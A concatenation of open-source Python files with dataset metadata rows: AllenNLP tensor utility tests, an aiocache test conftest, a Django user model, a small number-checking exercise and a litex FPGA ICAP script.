numpy.testing.assert_almost_equal(result[0].detach().cpu().numpy(), tensor2tensor_result)
numpy.testing.assert_almost_equal(result[1].detach().cpu().numpy(), tensor2tensor_result)
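# A hypothetical numpy sketch of the sinusoidal features being compared
# against tensor2tensor above: half the channels are sines and half cosines
# over a geometric range of timescales, with one zero channel appended for
# odd widths.

```python
import numpy

def positional_features(length, dim, min_timescale=1.0, max_timescale=1.0e4):
    num_timescales = dim // 2
    log_increment = numpy.log(max_timescale / min_timescale) / max(num_timescales - 1, 1)
    timescales = min_timescale * numpy.exp(numpy.arange(num_timescales) * -log_increment)
    scaled = numpy.arange(length)[:, None] * timescales[None, :]
    features = numpy.concatenate([numpy.sin(scaled), numpy.cos(scaled)], axis=1)
    if dim % 2:
        features = numpy.pad(features, [(0, 0), (0, 1)])  # zero-pad the odd channel
    return features
```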
def test_combine_tensors_and_multiply(self):
tensors = [torch.Tensor([[[2, 3]]]), torch.Tensor([[[5, 5]]])]
weight = torch.Tensor([4, 5])
combination = "x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[8 + 15]]
)
combination = "y"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[20 + 25]]
)
combination = "x,y"
weight2 = torch.Tensor([4, 5, 4, 5])
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight2), [[8 + 20 + 15 + 25]]
)
combination = "x-y"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[-3 * 4 + -2 * 5]]
)
combination = "y-x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[3 * 4 + 2 * 5]]
)
combination = "y+x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[7 * 4 + 8 * 5]]
)
combination = "y*x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[10 * 4 + 15 * 5]]
)
combination = "y/x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight),
[[(5 / 2) * 4 + (5 / 3) * 5]],
decimal=4,
)
combination = "x/y"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight),
[[(2 / 5) * 4 + (3 / 5) * 5]],
decimal=4,
)
with pytest.raises(ConfigurationError):
util.combine_tensors_and_multiply("x+y+y", tensors, weight)
with pytest.raises(ConfigurationError):
util.combine_tensors_and_multiply("x%y", tensors, weight)
def test_combine_tensors_and_multiply_with_same_batch_size_and_embedding_dim(self):
# This test just makes sure we handle some potential edge cases where the lengths of all
# dimensions are the same, making sure that the multiplication with the weight vector
# happens along the right dimension (it should be the last one).
tensors = [torch.Tensor([[[5, 5], [4, 4]], [[2, 3], [1, 1]]])] # (2, 2, 2)
weight = torch.Tensor([4, 5]) # (2,)
combination = "x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight),
[[20 + 25, 16 + 20], [8 + 15, 4 + 5]],
)
tensors = [
torch.Tensor([[[5, 5], [2, 2]], [[4, 4], [3, 3]]]),
torch.Tensor([[[2, 3]], [[1, 1]]]),
]
weight = torch.Tensor([4, 5])
combination = "x*y"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight),
[
[5 * 2 * 4 + 5 * 3 * 5, 2 * 2 * 4 + 2 * 3 * 5],
[4 * 1 * 4 + 4 * 1 * 5, 3 * 1 * 4 + 3 * 1 * 5],
],
)
def test_combine_tensors_and_multiply_with_batch_size_one(self):
seq_len_1 = 10
seq_len_2 = 5
embedding_dim = 8
combination = "x,y,x*y"
t1 = torch.randn(1, seq_len_1, embedding_dim)
t2 = torch.randn(1, seq_len_2, embedding_dim)
combined_dim = util.get_combined_dim(combination, [embedding_dim, embedding_dim])
weight = torch.Tensor(combined_dim)
result = util.combine_tensors_and_multiply(
combination, [t1.unsqueeze(2), t2.unsqueeze(1)], weight
)
assert_almost_equal(result.size(), [1, seq_len_1, seq_len_2])
def test_combine_tensors_and_multiply_with_batch_size_one_and_seq_len_one(self):
seq_len_1 = 10
seq_len_2 = 1
embedding_dim = 8
combination = "x,y,x*y"
t1 = torch.randn(1, seq_len_1, embedding_dim)
t2 = torch.randn(1, seq_len_2, embedding_dim)
combined_dim = util.get_combined_dim(combination, [embedding_dim, embedding_dim])
weight = torch.Tensor(combined_dim)
result = util.combine_tensors_and_multiply(
combination, [t1.unsqueeze(2), t2.unsqueeze(1)], weight
)
assert_almost_equal(result.size(), [1, seq_len_1, seq_len_2])
def test_has_tensor(self):
has_tensor = util.has_tensor
tensor = torch.tensor([1, 2, 3])
assert has_tensor(["a", 10, tensor])
assert not has_tensor(["a", 10])
assert has_tensor(("a", 10, tensor))
assert not has_tensor(("a", 10))
assert has_tensor({"a": tensor, "b": 1})
assert not has_tensor({"a": 10, "b": 1})
assert has_tensor(tensor)
assert not has_tensor(3)
assert has_tensor({"x": [0, {"inside": {"double_inside": [3, [10, tensor]]}}]})
def test_combine_initial_dims(self):
tensor = torch.randn(4, 10, 20, 17, 5)
tensor2d = util.combine_initial_dims(tensor)
assert list(tensor2d.size()) == [4 * 10 * 20 * 17, 5]
def test_uncombine_initial_dims(self):
embedding2d = torch.randn(4 * 10 * 20 * 17 * 5, 12)
embedding = util.uncombine_initial_dims(embedding2d, torch.Size((4, 10, 20, 17, 5)))
assert list(embedding.size()) == [4, 10, 20, 17, 5, 12]
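# The two helpers tested above are inverses of each other; a hypothetical
# sketch of the round trip using plain view calls:

```python
import torch

# Flatten all leading dimensions into one, keeping the last (embedding)
# dimension, then restore the original leading shape from the flat tensor.
original = torch.randn(4, 10, 5)
flat = original.view(-1, original.size(-1))       # (40, 5)
restored = flat.view(*original.size()[:-1], -1)   # (4, 10, 5)
assert torch.equal(original, restored)
```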
def test_inspect_model_parameters(self):
model_archive = str(
self.FIXTURES_ROOT / "decomposable_attention" / "serialization" / "model.tar.gz"
)
parameters_inspection = str(
self.FIXTURES_ROOT / "decomposable_attention" / "parameters_inspection.json"
)
model = load_archive(model_archive).model
with open(parameters_inspection) as file:
parameters_inspection_dict = json.load(file)
assert parameters_inspection_dict == util.inspect_parameters(model)
def test_move_to_device(self):
# We're faking the tensor here so that we can test the calls to .cuda() without actually
# needing a GPU.
class FakeTensor(torch.Tensor):
def __init__(self):
self._device = None
def cuda(self, device):
self._device = device
return self
class A(NamedTuple):
a: int
b: torch.Tensor
structured_obj = {
"a": [A(1, FakeTensor()), A(2, FakeTensor())],
"b": FakeTensor(),
"c": (1, FakeTensor()),
}
new_device = 4
moved_obj = util.move_to_device(structured_obj, new_device)
assert moved_obj["a"][0].a == 1
assert moved_obj["a"][0].b._device == new_device
assert moved_obj["a"][1].b._device == new_device
assert moved_obj["b"]._device == new_device
assert moved_obj["c"][0] == 1
assert moved_obj["c"][1]._device == new_device
def test_extend_layer(self):
lin_layer = torch.nn.Linear(10, 5)
new_dim = 8
old_weights = lin_layer.weight.data.clone()
old_bias = lin_layer.bias.data.clone()
util.extend_layer(lin_layer, new_dim)
assert lin_layer.weight.data.shape == (8, 10)
assert lin_layer.bias.data.shape == (8,)
assert (lin_layer.weight.data[:5] == old_weights).all()
assert (lin_layer.bias.data[:5] == old_bias).all()
assert lin_layer.out_features == new_dim
def test_masked_topk_selects_top_scored_items_and_respects_masking(self):
items = torch.randn([3, 4, 5]).clamp(min=0.0, max=1.0)
items[0, :2, :] = 1
items[1, 2:, :] = 1
items[2, 2:, :] = 1
scores = items.sum(-1)
mask = torch.ones([3, 4]).bool()
mask[1, 0] = 0
mask[1, 3] = 0
pruned_scores, pruned_mask, pruned_indices = util.masked_topk(scores, mask, 2)
# Second element in the batch would have indices 2, 3, but
# 3 and 0 are masked, so instead it has 1, 2.
numpy.testing.assert_array_equal(
pruned_indices.data.numpy(), numpy.array([[0, 1], [1, 2], [2, 3]])
)
numpy.testing.assert_array_equal(pruned_mask.data.numpy(), numpy.ones([3, 2]))
# scores should be the result of index_selecting the pruned_indices.
correct_scores = util.batched_index_select(scores.unsqueeze(-1), pruned_indices).squeeze(-1)
self.assert_array_equal_with_mask(correct_scores, pruned_scores, pruned_mask)
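# For the scalar-k case above, the selection can be sketched hypothetically
# (util.masked_topk also supports per-row k tensors and padding) by masking
# with -inf before topk and re-sorting the surviving indices:

```python
import torch

def simple_masked_topk(scores, mask, k):
    # Masked positions can never win topk once they are -inf; sorting the
    # surviving indices keeps items in their original sequence order.
    masked = scores.masked_fill(~mask, float("-inf"))
    _, indices = masked.topk(k, dim=-1)
    indices, _ = indices.sort(dim=-1)
    return indices

scores = torch.tensor([[1.0, 4.0, 3.0, 2.0]])
mask = torch.tensor([[True, False, True, True]])
# Index 1 holds the highest score but is masked, so 2 and 3 are kept.
print(simple_masked_topk(scores, mask, 2).tolist())  # [[2, 3]]
```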
def test_masked_topk_works_for_completely_masked_rows(self):
items = torch.randn([3, 4, 5]).clamp(min=0.0, max=1.0)
items[0, :2, :] = 1
items[1, 2:, :] = 1
items[2, 2:, :] = 1
scores = items.sum(-1)
mask = torch.ones([3, 4]).bool()
mask[1, 0] = 0
mask[1, 3] = 0
mask[2, :] = 0 # fully masked last batch element.
pruned_scores, pruned_mask, pruned_indices = util.masked_topk(scores, mask, 2)
# We can't check the indices for the last row, because it's completely
# masked; its slots are zeroed out in the returned mask instead.
numpy.testing.assert_array_equal(
pruned_indices[:2].data.numpy(), numpy.array([[0, 1], [1, 2]])
)
numpy.testing.assert_array_equal(
pruned_mask.data.numpy(), numpy.array([[1, 1], [1, 1], [0, 0]])
)
# scores should be the result of index_selecting the pruned_indices.
correct_scores = util.batched_index_select(scores.unsqueeze(-1), pruned_indices).squeeze(-1)
self.assert_array_equal_with_mask(correct_scores, pruned_scores, pruned_mask)
def test_masked_topk_selects_top_scored_items_and_respects_masking_different_num_items(self):
items = torch.randn([3, 4, 5]).clamp(min=0.0, max=1.0)
items[0, 0, :] = 1.5
items[0, 1, :] = 2
items[0, 3, :] = 1
items[1, 1:3, :] = 1
items[2, 0, :] = 1
items[2, 1, :] = 2
items[2, 2, :] = 1.5
scores = items.sum(-1)
mask = torch.ones([3, 4]).bool()
mask[1, 3] = 0
k = torch.tensor([3, 2, 1], dtype=torch.long)
pruned_scores, pruned_mask, pruned_indices = util.masked_topk(scores, mask, k)
# Second element in the batch would have indices 2, 3, but index 3 is
# masked, so instead it keeps 1 and 2 (its third slot is padding).
numpy.testing.assert_array_equal(
pruned_indices.data.numpy(), numpy.array([[0, 1, 3], [1, 2, 2], [1, 2, 2]])
)
numpy.testing.assert_array_equal(
pruned_mask.data.numpy(), numpy.array([[1, 1, 1], [1, 1, 0], [1, 0, 0]])
)
# scores should be the result of index_selecting the pruned_indices.
correct_scores = util.batched_index_select(scores.unsqueeze(-1), pruned_indices).squeeze(-1)
self.assert_array_equal_with_mask(correct_scores, pruned_scores, pruned_mask)
    def test_masked_topk_works_for_row_with_no_items_requested(self):
        # Case where `num_items_to_keep` is a tensor rather than an int. Make sure it does the right
        # thing when no items are requested for one of the rows.
        items = torch.randn([3, 4, 5]).clamp(min=0.0, max=1.0)
        items[0, :3, :] = 1
        items[1, 2:, :] = 1
        items[2, 2:, :] = 1

        scores = items.sum(-1)

        mask = torch.ones([3, 4]).bool()
        mask[1, 0] = 0
        mask[1, 3] = 0

        k = torch.tensor([3, 2, 0], dtype=torch.long)

        pruned_scores, pruned_mask, pruned_indices = util.masked_topk(scores, mask, k)

        # First element just picks top three entries. Second would pick entries 2 and 3, but 0 and 3
        # are masked, so it takes 1 and 2 (repeating the second index). The third element is
        # entirely masked and just repeats the largest index with a top-3 score.
        numpy.testing.assert_array_equal(
            pruned_indices.data.numpy(), numpy.array([[0, 1, 2], [1, 2, 2], [3, 3, 3]])
        )
        numpy.testing.assert_array_equal(
            pruned_mask.data.numpy(), numpy.array([[1, 1, 1], [1, 1, 0], [0, 0, 0]])
        )

        # scores should be the result of index_selecting the pruned_indices.
        correct_scores = util.batched_index_select(scores.unsqueeze(-1), pruned_indices).squeeze(-1)
        self.assert_array_equal_with_mask(correct_scores, pruned_scores, pruned_mask)
    def test_masked_topk_works_for_multiple_dimensions(self):
        # fmt: off
        items = torch.FloatTensor([  # (3, 2, 5)
            [[4, 2, 9, 9, 7], [-4, -2, -9, -9, -7]],
            [[5, 4, 1, 8, 8], [9, 1, 7, 4, 1]],
            [[9, 8, 9, 6, 0], [2, 2, 2, 2, 2]],
        ]).unsqueeze(-1).expand(3, 2, 5, 4)

        mask = torch.tensor([
            [[False, False, False, False, False], [True, True, True, True, True]],
            [[True, True, True, True, False], [False, True, True, True, True]],
            [[True, False, True, True, True], [False, True, False, True, True]],
        ]).unsqueeze(-1).expand(3, 2, 5, 4)

        # This is the same as just specifying a scalar int, but we want to test this behavior
        k = torch.ones(3, 5, 4, dtype=torch.long)
        k[1, 3, :] = 2

        target_items = torch.FloatTensor([
            [[-4, -2, -9, -9, -7], [0, 0, 0, 0, 0]],
            [[5, 4, 7, 8, 1], [0, 0, 0, 4, 0]],
            [[9, 2, 9, 6, 2], [0, 0, 0, 0, 0]],
        ]).unsqueeze(-1).expand(3, 2, 5, 4)

        target_mask = torch.ones(3, 2, 5, 4, dtype=torch.bool)
        target_mask[:, 1, :, :] = 0
        target_mask[1, 1, 3, :] = 1

        target_indices = torch.LongTensor([
            [[1, 1, 1, 1, 1], [0, 0, 0, 0, 0]],
            [[0, 0, 1, 0, 1], [0, 0, 0, 1, 0]],
            [[0, 1, 0, 0, 1], [0, 0, 0, 0, 0]],
        ]).unsqueeze(-1).expand(3, 2, 5, 4)
        # fmt: on

        pruned_items, pruned_mask, pruned_indices = util.masked_topk(items, mask, k, dim=1)

        numpy.testing.assert_array_equal(pruned_mask.data.numpy(), target_mask.data.numpy())
        self.assert_array_equal_with_mask(pruned_items, target_items, pruned_mask)
        self.assert_array_equal_with_mask(pruned_indices, target_indices, pruned_mask)
    def assert_array_equal_with_mask(self, a, b, mask):
        numpy.testing.assert_array_equal((a * mask).data.numpy(), (b * mask).data.numpy())
    def test_tensors_equal(self):
        # Basic
        assert util.tensors_equal(torch.tensor([1]), torch.tensor([1]))
        assert not util.tensors_equal(torch.tensor([1]), torch.tensor([2]))

        # Bool
        assert util.tensors_equal(torch.tensor([True]), torch.tensor([True]))

        # Cross dtype
        assert util.tensors_equal(torch.tensor([1]), torch.tensor([1.0]))
        assert util.tensors_equal(torch.tensor([1]), torch.tensor([True]))

        # Containers
        assert util.tensors_equal([torch.tensor([1])], [torch.tensor([1])])
        assert not util.tensors_equal([torch.tensor([1])], [torch.tensor([2])])
        assert util.tensors_equal({"key": torch.tensor([1])}, {"key": torch.tensor([1])})
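The masked top-k semantics exercised by the tests above can be sketched framework-free. This is a hypothetical pure-Python analogue of `util.masked_topk` for a single row (not AllenNLP code); note it pads a fully masked row with index 0, whereas the torch implementation may repeat a different index there:

```python
def masked_topk(scores, mask, k):
    """Top-k over unmasked positions; short rows pad by repeating the last index
    with a 0 in the returned mask (sketch of the behaviour, not allennlp's code)."""
    valid = [i for i, m in enumerate(mask) if m]
    ranked = sorted(valid, key=lambda i: scores[i], reverse=True)[:k]
    ranked.sort()  # keep original ordering, as the tested util does
    out_mask = [1] * len(ranked) + [0] * (k - len(ranked))
    indices = ranked + [ranked[-1] if ranked else 0] * (k - len(ranked))
    return [scores[i] for i in indices], out_mask, indices
```

With `scores = [10.0, 8.0, 9.0, 1.0]` and two masked positions, a request for k=3 repeats the last valid index exactly as asserted in the tests above.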
| 44.1418 | 111 | 0.58091 | 9,793 | 71,598 | 4.065251 | 0.063106 | 0.017935 | 0.015373 | 0.01055 | 0.755269 | 0.721358 | 0.691944 | 0.665695 | 0.64231 | 0.614202 | 0 | 0.076833 | 0.280874 | 71,598 | 1,621 | 112 | 44.169031 | 0.696376 | 0.109416 | 0 | 0.465643 | 0 | 0 | 0.005459 | 0.001101 | 0 | 0 | 0 | 0 | 0.154406 | 1 | 0.050121 | false | 0.000808 | 0.010509 | 0 | 0.064673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a3cbbc7fd1c54f45bbdf7b34e3c92733082359d | 2,280 | py | Python | tests/ut/conftest.py | rspadim/aiocache | bf675ae912173bee25cc1d8c22b77f57de34375d | [
"BSD-3-Clause"
] | 213 | 2020-11-02T14:29:46.000Z | 2022-03-24T23:12:32.000Z | tests/ut/conftest.py | rspadim/aiocache | bf675ae912173bee25cc1d8c22b77f57de34375d | [
"BSD-3-Clause"
] | 48 | 2020-11-02T11:17:13.000Z | 2022-03-24T17:55:31.000Z | tests/ut/conftest.py | rspadim/aiocache | bf675ae912173bee25cc1d8c22b77f57de34375d | [
"BSD-3-Clause"
] | 49 | 2020-11-13T07:41:37.000Z | 2022-03-25T12:24:49.000Z | import pytest
import asynctest

from aiocache.base import BaseCache, API
from aiocache import caches, RedisCache, MemcachedCache
from aiocache.plugins import BasePlugin
from aiocache.serializers import BaseSerializer


def pytest_configure():
    """
    pytest_namespace used to be the way to set the keys for testing,
    but the feature was removed:
    https://docs.pytest.org/en/latest/deprecations.html#pytest-namespace
    """
    pytest.KEY = "key"
    pytest.KEY_1 = "random"


@pytest.fixture(autouse=True)
def reset_caches():
    caches.set_config(
        {
            "default": {
                "cache": "aiocache.SimpleMemoryCache",
                "serializer": {"class": "aiocache.serializers.NullSerializer"},
            }
        }
    )


class MockCache(BaseCache):
    def __init__(self):
        super().__init__()
        self._add = asynctest.CoroutineMock()
        self._get = asynctest.CoroutineMock()
        self._gets = asynctest.CoroutineMock()
        self._set = asynctest.CoroutineMock()
        self._multi_get = asynctest.CoroutineMock(return_value=["a", "b"])
        self._multi_set = asynctest.CoroutineMock()
        self._delete = asynctest.CoroutineMock()
        self._exists = asynctest.CoroutineMock()
        self._increment = asynctest.CoroutineMock()
        self._expire = asynctest.CoroutineMock()
        self._clear = asynctest.CoroutineMock()
        self._raw = asynctest.CoroutineMock()
        self._redlock_release = asynctest.CoroutineMock()
        self.acquire_conn = asynctest.CoroutineMock()
        self.release_conn = asynctest.CoroutineMock()
        self._close = asynctest.CoroutineMock()


@pytest.fixture
def mock_cache(mocker):
    cache = MockCache()
    cache.timeout = 0.002
    mocker.spy(cache, "_build_key")
    for cmd in API.CMDS:
        mocker.spy(cache, cmd.__name__)
    mocker.spy(cache, "close")
    cache.serializer = asynctest.Mock(spec=BaseSerializer)
    cache.serializer.encoding = "utf-8"
    cache.plugins = [asynctest.Mock(spec=BasePlugin)]
    return cache


@pytest.fixture
def base_cache():
    return BaseCache()


@pytest.fixture
def redis_cache():
    cache = RedisCache()
    return cache


@pytest.fixture
def memcached_cache():
    cache = MemcachedCache()
    return cache
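The `asynctest.CoroutineMock` pattern used in `MockCache` predates standard-library support; on Python 3.8+ the same idea can be sketched with `unittest.mock.AsyncMock` (assumption: a drop-in for these simple awaitable stubs, not part of this conftest):

```python
import asyncio
from unittest.mock import AsyncMock


class MockCacheSketch:
    """Minimal stand-in mirroring the asynctest-based MockCache above."""

    def __init__(self):
        # Each backend coroutine becomes an awaitable mock with a canned result.
        self._get = AsyncMock(return_value="cached")
        self._multi_get = AsyncMock(return_value=["a", "b"])


async def exercise(cache):
    value = await cache._get("key")
    pair = await cache._multi_get(["k1", "k2"])
    return value, pair


cache = MockCacheSketch()
value, pair = asyncio.run(exercise(cache))
cache._get.assert_awaited_once_with("key")  # call recording works as with CoroutineMock
```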
| 27.804878 | 79 | 0.675 | 238 | 2,280 | 6.285714 | 0.390756 | 0.235294 | 0.243316 | 0.03877 | 0.036096 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003365 | 0.217982 | 2,280 | 81 | 80 | 28.148148 | 0.83567 | 0.071491 | 0 | 0.114754 | 0 | 0 | 0.056856 | 0.029145 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0 | 0.098361 | 0.016393 | 0.295082 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a45222032afc0d45b3704fce040bfb9e95e4f75 | 179 | py | Python | aioffsend/__init__.py | Chenwe-i-lin/aioffsend | fb4a9070042d91de2f929b4c298310766d0377f7 | [
"MIT"
] | null | null | null | aioffsend/__init__.py | Chenwe-i-lin/aioffsend | fb4a9070042d91de2f929b4c298310766d0377f7 | [
"MIT"
] | null | null | null | aioffsend/__init__.py | Chenwe-i-lin/aioffsend | fb4a9070042d91de2f929b4c298310766d0377f7 | [
"MIT"
] | null | null | null | from .highlevel import (
    upload,
    delete,
    download,
    set_params,
    get_metadata,
    get_owner_info
)
from .midlevel import FFSend
from .lowlevel import FFSendAPI | 16.272727 | 31 | 0.703911 | 21 | 179 | 5.809524 | 0.761905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.240223 | 179 | 11 | 31 | 16.272727 | 0.897059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.3 | 0 | 0.3 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a490534731ba006b0b50ab404eae70a803214f3 | 1,068 | py | Python | Set-14-2021/tarefa.py | gianbianchi/Uniso | 3abd036bde0b9d9e02ae4f95bae10af4f0a0bae7 | [
"MIT"
] | null | null | null | Set-14-2021/tarefa.py | gianbianchi/Uniso | 3abd036bde0b9d9e02ae4f95bae10af4f0a0bae7 | [
"MIT"
] | null | null | null | Set-14-2021/tarefa.py | gianbianchi/Uniso | 3abd036bde0b9d9e02ae4f95bae10af4f0a0bae7 | [
"MIT"
] | null | null | null | n1 = int(input("Digite n1: "))
n2 = int(input("Digite n2: "))
if (n2 == 0):
    print("Não é possível dividir por zero.")

if (n1 % 3 == 0 and n1 % 5 == 0):
    print("O número n1 = {} é divisível por 3 e 5.".format(n1))
else:
    print("O número n1 = {} não é divisível por 3 e 5 ao mesmo tempo".format(n1))

if (n2 % 3 == 0 and n2 % 5 == 0):
    print("O número n2 = {} é divisível por 3 e 5.".format(n2))
else:
    print("O número n2 = {} não é divisível por 3 e 5 ao mesmo tempo".format(n2))

if (n1 > 0):
    print("O número n1 = {} é positivo".format(n1))
    if (n1 % 4 == 0):
        print("e divisível por 4")
elif (n1 < 0):
    print("O número n1 = {} é negativo".format(n1))
    if (n1 % 4 == 0):
        print("e divisível por 4")
else:
    print("O número n1 é zero.")

if (n2 > 0):
    print("O número n2 = {} é positivo".format(n2))
    if (n2 % 4 == 0):
        print("e divisível por 4")
elif (n2 < 0):
    print("O número n2 = {} é negativo".format(n2))
    if (n2 % 4 == 0):
        print("e divisível por 4")
else:
    print("O número n2 é zero.")
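The script above repeats the same divisibility and sign checks for `n1` and `n2`. The duplicated logic can be factored into one helper (a sketch; `describe` is a hypothetical function, not part of the exercise, with the messages rendered in English):

```python
def describe(n, label):
    """Return the same facts the script prints for one number."""
    facts = []
    if n % 3 == 0 and n % 5 == 0:
        facts.append(f"{label} = {n} is divisible by 3 and 5")
    # Sign check, with the divisible-by-4 note only for nonzero numbers,
    # mirroring the nested ifs in the script.
    if n > 0:
        facts.append(f"{label} = {n} is positive")
    elif n < 0:
        facts.append(f"{label} = {n} is negative")
    else:
        facts.append(f"{label} is zero")
    if n != 0 and n % 4 == 0:
        facts.append("and divisible by 4")
    return facts
```

Calling `describe(n1, "n1")` and `describe(n2, "n2")` then replaces both duplicated blocks.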
8a4c7b9da8478218612fb444dc54b52b37aeddbd | 2,574 | py | Python | users/models.py | itimor/weekReport | 6da9bb93de1df8195f87d9e032ae31968c95a7c3 | [
"MIT"
] | 3 | 2018-03-01T10:08:23.000Z | 2020-03-31T09:58:41.000Z | users/models.py | itimor/weekReport | 6da9bb93de1df8195f87d9e032ae31968c95a7c3 | [
"MIT"
] | null | null | null | users/models.py | itimor/weekReport | 6da9bb93de1df8195f87d9e032ae31968c95a7c3 | [
"MIT"
] | 4 | 2018-07-31T12:14:29.000Z | 2020-10-21T06:41:36.000Z | # -*- coding: utf-8 -*-
# author: itimor
from django.db import models
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser
class UserManager(BaseUserManager):
    def create_user(self, username, password=None):
        '''username is the unique identifier; raise an error if it is missing'''
        if not username:
            raise ValueError('Users must have an username')

        user = self.model(
            username=username,
        )
        user.set_password(password)  # set the password
        user.save(using=self._db)  # save the user
        return user

    def create_superuser(self, username, password):
        user = self.create_user(username=username,
                                password=password,
                                )
        user.is_admin = True  # the one extra field compared to a regular user
        user.save(using=self._db)
        return user


class User(AbstractBaseUser):
    username = models.CharField(max_length=32, unique=True, db_index=True)
    email = models.EmailField(max_length=255, unique=True, blank=True)
    name = models.CharField(max_length=100, null=True, blank=True, verbose_name=u'中文名')
    group = models.ForeignKey('Group', on_delete=models.SET_NULL, null=True, blank=True, verbose_name=u'部门或组')
    create_date = models.DateField(auto_now=True, verbose_name=u'创建时间')
    is_active = models.BooleanField(default=True)
    is_admin = models.BooleanField(default=False)
    roles = models.ForeignKey('Role', on_delete=models.SET_NULL, null=True, blank=True, verbose_name=u'角色')

    USERNAME_FIELD = 'username'  # there must be one unique identifier -- USERNAME_FIELD
    # REQUIRED_FIELDS = ['email']  # required fields when creating a superuser

    def __str__(self):  # __unicode__ on Python 2
        return self.username

    @property
    def is_staff(self):
        return self.is_admin

    class Meta:
        verbose_name = u'用户'
        verbose_name_plural = u'用户'

    objects = UserManager()  # manager used to create users


class Group(models.Model):
    name = models.CharField(max_length=64, unique=True, verbose_name=u'部门')
    desc = models.CharField(max_length=64, null=True, blank=True, verbose_name=u'描述')

    def __str__(self):
        return self.name

    class Meta:
        verbose_name = u'组'
        verbose_name_plural = u'部门'


class Role(models.Model):
    name = models.CharField(max_length=64, unique=True, verbose_name=u'角色')
    cnname = models.CharField(max_length=64, unique=True, verbose_name=u'中文名')
    desc = models.CharField(max_length=64, null=True, blank=True, verbose_name=u'描述')

    def __str__(self):
        return self.name

    class Meta:
        verbose_name = u'角色'
        verbose_name_plural = u'角色'
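The manager pattern above (validate, build, flag) can be illustrated without Django; this is a hypothetical framework-free simplification, not a replacement for the ORM-backed `UserManager`:

```python
class PlainUser:
    """Bare user object standing in for the Django model."""

    def __init__(self, username):
        self.username = username
        self.is_admin = False


class PlainUserManager:
    def create_user(self, username):
        # Same guard as UserManager.create_user: the unique identifier is required.
        if not username:
            raise ValueError('Users must have an username')
        return PlainUser(username)

    def create_superuser(self, username):
        user = self.create_user(username)
        user.is_admin = True  # the one extra field, as in create_superuser above
        return user
```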
8a4d4e1ecd7f4e0e93ca7f5da0137f260149deaf | 314 | py | Python | test/test_icap.py | antmicro/netv2 | f49e0635d197e381c4a5cce8dd9816962a519a48 | [
"Net-SNMP",
"Xnet"
] | null | null | null | test/test_icap.py | antmicro/netv2 | f49e0635d197e381c4a5cce8dd9816962a519a48 | [
"Net-SNMP",
"Xnet"
] | 4 | 2020-08-18T18:29:38.000Z | 2021-01-25T21:31:25.000Z | test/test_icap.py | antmicro/netv2 | f49e0635d197e381c4a5cce8dd9816962a519a48 | [
"Net-SNMP",
"Xnet"
] | null | null | null | #!/usr/bin/env python3
from litex import RemoteClient
wb = RemoteClient()
wb.open()
# # #
def icap_send(addr, data):
    wb.regs.icap_addr.write(addr)
    wb.regs.icap_data.write(data)
    wb.regs.icap_send.write(1)
    while (wb.regs.icap_done.read() == 0):
        pass
# iprog
icap_send(0x04, 0x0000000f)
# # #
wb.close()
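The write-then-poll handshake in `icap_send` can be exercised against a fake register bank; the `FakeReg`/`FakeRegs` classes below are hypothetical test doubles, not part of the litex API:

```python
class FakeReg:
    """Records writes and serves reads like a litex CSR register would."""

    def __init__(self, value=0):
        self.value = value

    def write(self, v):
        self.value = v

    def read(self):
        return self.value


class FakeRegs:
    def __init__(self):
        self.icap_addr = FakeReg()
        self.icap_data = FakeReg()
        self.icap_send = FakeReg()
        self.icap_done = FakeReg(value=1)  # report done immediately, so the poll exits


def icap_send(regs, addr, data):
    # Same sequence as the script: latch address and data, pulse send, poll done.
    regs.icap_addr.write(addr)
    regs.icap_data.write(data)
    regs.icap_send.write(1)
    while regs.icap_done.read() == 0:
        pass


regs = FakeRegs()
icap_send(regs, 0x04, 0x0000000F)
```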
| 13.652174 | 39 | 0.687898 | 50 | 314 | 4.2 | 0.54 | 0.114286 | 0.190476 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052045 | 0.143312 | 314 | 22 | 40 | 14.272727 | 0.728625 | 0.092357 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050909 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
